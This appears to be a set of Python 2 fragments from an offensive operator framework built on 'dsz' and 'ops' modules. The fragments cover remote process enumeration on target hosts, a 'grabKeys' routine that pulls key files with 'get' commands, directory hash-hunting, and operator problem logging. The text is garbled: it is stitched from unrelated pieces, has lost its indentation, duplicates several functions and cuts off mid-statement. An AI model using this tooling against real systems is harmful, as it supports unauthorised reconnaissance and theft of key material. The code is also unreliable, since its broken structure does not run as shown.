def pulist(ip, dszquiet=False):
flags = dsz.control.Method()
if dszquiet:
dsz.control.quiet.On()
dsz.control.echo.Off()
cmd = ops.cmd.getDszCommand('performance', dszuser=ops.cmd.CURRENT_USER, data='Process', bare=True, target=(ip if (ip != '127.0.0.1') else None))
ops.info(("Running '%s'..." % cmd))
result = cmd.execute()
if (not cmd.success):
if (result.commandmetadata.status == 268435456):
ops.error(('Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.' % result.cmdid))
del flags
return None
elif (result.commandmetadata.status is None):
dszlogger = DSZPyLogger()
log = dszlogger.getLogger(LOGFILE)
log.error('Command did not execute, possibly the result of a malformed command line.')
ops.info('A problem report has been automatically generated for this issue.', type=dsz.DEFAULT)
else:
ops.error(('Failed to query performance hive. Check your logs for command ID %d for more information.' % result.cmdid))
del flags
return None
if (not result.performance.object):
ops.error(('Query succeeded but returned no data. Check your logs for command ID %d and hope for enlightenment.' % result.cmdid))
regex = re.compile('.+\\....$')
table = []
echo = []
uptime = None
for instance in result.performance.object[0].instance:
if (regex.match(instance.name) is None):
proc = (instance.name + '.exe')
else:
proc = instance.name
for c in instance.counter:
if (c.name == '784'):
pid = int(c.value)
elif (c.name == '1410'):
ppid = int(c.value)
elif (c.name == '684'):
runtime = datetime.timedelta(microseconds=((result.performance.perfTime100nSec - int(c.value)) // 10))
if (((pid == 0) and (ppid == 0) and (instance.name == 'Idle')) or (((pid == 4) or (pid == 8)) and (instance.name == 'System'))):
[code, comment] = [dsz.DEFAULT, ('System Idle Counter' if (instance.name == 'Idle') else 'System Kernel')]
elif ((pid == 0) and (ppid == 0) and (instance.name == '_Total') and (runtime == datetime.timedelta(microseconds=0))):
continue
else:
[code, comment] = check_process(proc)
table.append({'Process': instance.name, 'PID': pid, 'PPID': ppid, 'Comment': comment, 'Elapsed Time': runtime})
echo.append(code)
pprint(table, dictorder=['PID', 'PPID', 'Elapsed Time', 'Process', 'Comment'], echocodes=echo)
del flags
return result
def main():
if (ops.TARGET_ADDR == 'z0.0.0.1'):
ops.warn('Problems can only be reported from target sessions. If you have no more target sessions, please complain about the problem through other means')
sys.exit((-1))
toolName = sys.argv[1]
if (not dsz.env.Check('OPS_USERID')):
idnum = dsz.ui.GetInt('Please enter your ID')
dsz.env.Set('OPS_USERID', str(idnum), 0, '')
idnum = dsz.env.Get('OPS_USERID')
problemText = ' '.join(sys.argv[2:])
dszLogger = DSZPyLogger()
toolLog = dszLogger.getLogger(toolName)
toolLog.log(21, ((idnum + ':') + problemText))
ops.info('Your problem has been logged and will be reported when you are done')
def __init__(self, file, name):
self.file = file
self.name = name
f = open(file, 'r')
self.Priority = 10
try:
for line in f:
line = line.strip()
item = line.split(None, 1)
self.__dict__[item[0]] = item[1]
except:
DSZPyLogger = DSZPyLogger()
taskingLog = DSZPyLogger.getLogger('TaskingLog')
taskingLog.warning(('Tasking.py failed to parse: %s' % file))
shutil.copy(file, os.path.join(DSZPyLogger.LOG_FILE_DIR, '..'))
def main():
if (ops.TARGET_ADDR == 'z0.0.0.1'):
ops.warn(
'Problems can only be reported from target sessions. If you have no more target sessions, please complain about the problem through other means'
)
sys.exit((-1))
toolName = sys.argv[1]
if (not dsz.env.Check('OPS_USERID')):
idnum = dsz.ui.GetInt('Please enter your ID')
dsz.env.Set('OPS_USERID', str(idnum), 0, '')
idnum = dsz.env.Get('OPS_USERID')
problemText = ' '.join(sys.argv[2:])
dszLogger = DSZPyLogger()
toolLog = dszLogger.getLogger(toolName)
toolLog.log(21, ((idnum + ':') + problemText))
ops.info(
'Your problem has been logged and will be reported when you are done')
def emkg_plist(ip, dszquiet=False):
flags = dsz.control.Method()
if dszquiet:
dsz.control.quiet.On()
dsz.control.echo.Off()
cmd = ops.cmd.getDszCommand('processes', dszuser=ops.cmd.CURRENT_USER, list=True, target=(ip if (ip != '127.0.0.1') else None))
ops.info(("Running '%s'..." % cmd))
result = cmd.execute()
if (not cmd.success):
if (result.commandmetadata.status == 268435456):
ops.error(('Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.' % result.cmdid))
del flags
return None
elif (result.commandmetadata.status is None):
dszlogger = DSZPyLogger()
log = dszlogger.getLogger(LOGFILE)
log.error('Command did not execute, possibly the result of a malformed command line.')
ops.info('A problem report has been automatically generated for this issue.', type=dsz.DEFAULT)
else:
ops.error(('Failed to query performance hive. Check your logs for command ID %d for more information.' % result.cmdid))
del flags
return None
table = []
echo = []
for processitem in result.initialprocesslistitem.processitem:
if ((processitem.id == 0) and (processitem.parentid == 0)):
name = 'System Idle Process'
else:
name = processitem.name
[code, comment] = check_process(name)
table.append({'Path': processitem.path, 'Process': name, 'PID': processitem.id, 'PPID': processitem.parentid, 'Created': ('' if ((processitem.name == 'System') or (processitem.name == 'System Idle Process')) else ('%s %s %s' % (processitem.created.date, processitem.created.time, processitem.created.type.upper()))), 'Comment': comment, 'User': processitem.user})
echo.append(code)
if ((ip is None) or (ip == '127.0.0.1')):
pprint(table, dictorder=['PID', 'PPID', 'Created', 'Path', 'Process', 'User', 'Comment'], echocodes=echo)
else:
pprint(table, dictorder=['PID', 'PPID', 'Created', 'Path', 'Process', 'Comment'], echocodes=echo)
del flags
return result
def error(s, log=DEFAULT_LOG):
logger = DSZPyLogger().getLogger(log)
logger.error(s)
def pulist(ip, dszquiet=False):
flags = dsz.control.Method()
if dszquiet:
dsz.control.quiet.On()
dsz.control.echo.Off()
cmd = ops.cmd.getDszCommand('performance',
dszuser=ops.cmd.CURRENT_USER,
data='Process',
bare=True,
target=(ip if (ip != '127.0.0.1') else None))
ops.info(("Running '%s'..." % cmd))
result = cmd.execute()
if (not cmd.success):
if (result.commandmetadata.status == 268435456):
ops.error((
'Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.'
% result.cmdid))
del flags
return None
elif (result.commandmetadata.status is None):
dszlogger = DSZPyLogger()
log = dszlogger.getLogger(LOGFILE)
log.error(
'Command did not execute, possibly the result of a malformed command line.'
)
ops.info(
'A problem report has been automatically generated for this issue.',
type=dsz.DEFAULT)
else:
ops.error((
'Failed to query performance hive. Check your logs for command ID %d for more information.'
% result.cmdid))
del flags
return None
if (not result.performance.object):
ops.error((
'Query succeeded but returned no data. Check your logs for command ID %d and hope for enlightenment.'
% result.cmdid))
regex = re.compile('.+\\....$')
table = []
echo = []
uptime = None
for instance in result.performance.object[0].instance:
if (regex.match(instance.name) is None):
proc = (instance.name + '.exe')
else:
proc = instance.name
for c in instance.counter:
if (c.name == '784'):
pid = int(c.value)
elif (c.name == '1410'):
ppid = int(c.value)
elif (c.name == '684'):
runtime = datetime.timedelta(microseconds=(
(result.performance.perfTime100nSec - int(c.value)) // 10))
if (((pid == 0) and (ppid == 0) and (instance.name == 'Idle')) or
(((pid == 4) or (pid == 8)) and (instance.name == 'System'))):
[code, comment] = [
dsz.DEFAULT,
('System Idle Counter' if
(instance.name == 'Idle') else 'System Kernel')
]
elif ((pid == 0) and (ppid == 0) and (instance.name == '_Total')
and (runtime == datetime.timedelta(microseconds=0))):
continue
else:
[code, comment] = check_process(proc)
table.append({
'Process': instance.name,
'PID': pid,
'PPID': ppid,
'Comment': comment,
'Elapsed Time': runtime
})
echo.append(code)
pprint(table,
dictorder=['PID', 'PPID', 'Elapsed Time', 'Process', 'Comment'],
echocodes=echo)
del flags
return result
for fullpath in getlist:
command = ('get "%s"' % fullpath)
dsz.cmd.Run(command, dsz.RUN_FLAG_RECORD)
def main():
last_run = ops.marker.get('GRABKEYS')['last_date']
if ((datetime.datetime.now() - last_run) <= RUN_PERIOD):
ops.info(('grabKeys was run in the last %s, not running again' % str(RUN_PERIOD)))
return
answer = dsz.ui.Prompt(('Do you want to run grabKeys? Last run was %s' % last_run))
if (not answer):
return
masks = getMaskList()
for mask in masks:
try:
getKeys(mask, last_run)
except:
ops.error(('Failed to get keys with mask "%s"' % mask))
traceback.print_exc()
ops.info('All masks completed or at least attempted, marking grabKeys done')
ops.marker.set('GRABKEYS')
if (__name__ == '__main__'):
try:
main()
except:
ops.error('Grabkeys had a major failure')
traceback.print_exc()
problemText = str(sys.exc_info())
dszLogger = DSZPyLogger()
toolLog = dszLogger.getLogger('grabkeys')
toolLog.log(10, problemText)
if args:
parser.print_help()
parser.error('Not all arguments consumed by the beast.')
if (not (options.wmi ^ options.reg)):
parser.print_help()
parser.error('One of --wmi or --reg must be specified so I know what to do.')
if (options.target is None):
if (not dsz.ui.Prompt('No target provided. Did you really mean to run this against localhost?', False)):
sys.exit((-1))
if ((options.target is not None) and options.target.startswith('\\\\')):
options.target = options.target[2:]
ops.info(("A \\\\ is not required. I assume you mean '%s' as your target IP." % options.target))
if ((options.target is not None) and (not util.ip.validate(options.target))):
ops.error(("Your target '%s' does not appear to be a proper IP address. Try again." % options.target))
sys.exit((-1))
if options.wmi:
func = emkg_plist
elif options.reg:
func = pulist
else:
raise RuntimeError, "How'd you get here? You get a prize!"
try:
ret = func(options.target, dszquiet)
except Exception as e:
dszlogger = DSZPyLogger()
log = dszlogger.getLogger(LOGFILE)
log.error(traceback.format_exc())
ops.info('Unexpected things happened. A problem report has been automatically generated for this issue.', type=dsz.DEFAULT)
ret = False
if (not ret):
sys.exit((-1))
def warn(s, log=DEFAULT_LOG):
logger = DSZPyLogger().getLogger(log)
logger.warn(s)
def debug(s, log=DEFAULT_LOG):
if _debug_enabled:
logger = DSZPyLogger().getLogger(log)
logger.debug(s)
return _debug_enabled
def warn(s, log=DEFAULT_LOG):
logger = DSZPyLogger().getLogger(log)
logger.warn(s)
def error(s, log=DEFAULT_LOG):
logger = DSZPyLogger().getLogger(log)
logger.error(s)
import ops.cmd, ops.db, ops
import os.path
import dsz
from ops.pprint import pprint
import sys
from util.DSZPyLogger import DSZPyLogger
from datetime import timedelta
import optparse
dzlogger = DSZPyLogger()
drvlog = dzlogger.getLogger('DRIVERLIST')
def main(argv=None):
parser = optparse.OptionParser()
parser.add_option('-a', dest='maxage', action='store', type='int', default=3600, help='The maximum age for any particular dir')
options = parser.parse_args(argv)[0]
maxage = options.maxage
voldb = ops.db.get_voldb()
conn = voldb.connection
with conn:
curs = conn.execute('SELECT mask,path FROM hashhunter WHERE cpaddr=?', [ops.TARGET_ADDR])
dir_list = []
for row in curs:
dir_list.append([row['mask'], row['path']])
completed = []
for item in dir_list:
if (item in completed):
continue
dircmd = ops.cmd.getDszCommand('dir -hash sha1 -max 0')
dircmd.mask = item[0]
dircmd.path = item[1]
def emkg_plist(ip, dszquiet=False):
flags = dsz.control.Method()
if dszquiet:
dsz.control.quiet.On()
dsz.control.echo.Off()
cmd = ops.cmd.getDszCommand('processes',
dszuser=ops.cmd.CURRENT_USER,
list=True,
target=(ip if (ip != '127.0.0.1') else None))
ops.info(("Running '%s'..." % cmd))
result = cmd.execute()
if (not cmd.success):
if (result.commandmetadata.status == 268435456):
ops.error((
'Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.'
% result.cmdid))
del flags
return None
elif (result.commandmetadata.status is None):
dszlogger = DSZPyLogger()
log = dszlogger.getLogger(LOGFILE)
log.error(
'Command did not execute, possibly the result of a malformed command line.'
)
ops.info(
'A problem report has been automatically generated for this issue.',
type=dsz.DEFAULT)
else:
ops.error((
'Failed to query performance hive. Check your logs for command ID %d for more information.'
% result.cmdid))
del flags
return None
table = []
echo = []
for processitem in result.initialprocesslistitem.processitem:
if ((processitem.id == 0) and (processitem.parentid == 0)):
name = 'System Idle Process'
else:
name = processitem.name
[code, comment] = check_process(name)
table.append({
'Path':
processitem.path,
'Process':
name,
'PID':
processitem.id,
'PPID':
processitem.parentid,
'Created':
('' if ((processitem.name == 'System') or
(processitem.name == 'System Idle Process')) else
('%s %s %s' % (processitem.created.date, processitem.created.time,
processitem.created.type.upper()))),
'Comment':
comment,
'User':
processitem.user
})
echo.append(code)
if ((ip is None) or (ip == '127.0.0.1')):
pprint(table,
dictorder=[
'PID', 'PPID', 'Created', 'Path', 'Process', 'User',
'Comment'
],
echocodes=echo)
else:
pprint(
table,
dictorder=['PID', 'PPID', 'Created', 'Path', 'Process', 'Comment'],
echocodes=echo)
del flags
return result
False)):
sys.exit((-1))
if ((options.target is not None) and options.target.startswith('\\\\')):
options.target = options.target[2:]
ops.info((
"A \\\\ is not required. I assume you mean '%s' as your target IP."
% options.target))
if ((options.target is not None)
and (not util.ip.validate(options.target))):
ops.error((
"Your target '%s' does not appear to be a proper IP address. Try again."
% options.target))
sys.exit((-1))
if options.wmi:
func = emkg_plist
elif options.reg:
func = pulist
else:
raise RuntimeError, "How'd you get here? You get a prize!"
try:
ret = func(options.target, dszquiet)
except Exception as e:
dszlogger = DSZPyLogger()
log = dszlogger.getLogger(LOGFILE)
log.error(traceback.format_exc())
ops.info(
'Unexpected things happened. A problem report has been automatically generated for this issue.',
type=dsz.DEFAULT)
ret = False
if (not ret):
sys.exit((-1))
def debug(s, log=DEFAULT_LOG):
if _debug_enabled:
logger = DSZPyLogger().getLogger(log)
logger.debug(s)
return _debug_enabled
import ops.cmd, ops.db, ops
import os.path
import dsz
from ops.pprint import pprint
import sys
from util.DSZPyLogger import DSZPyLogger
from datetime import timedelta
import optparse
dzlogger = DSZPyLogger()
drvlog = dzlogger.getLogger('DRIVERLIST')
def main(argv=None):
parser = optparse.OptionParser()
parser.add_option('-a',
dest='maxage',
action='store',
type='int',
default=3600,
help='The maximum age for any particular dir')
options = parser.parse_args(argv)[0]
maxage = options.maxage
voldb = ops.db.get_voldb()
conn = voldb.connection
with conn:
curs = conn.execute('SELECT mask,path FROM hashhunter WHERE cpaddr=?',
[ops.TARGET_ADDR])
dir_list = []
for row in curs:
dir_list.append([row['mask'], row['path']])
completed = []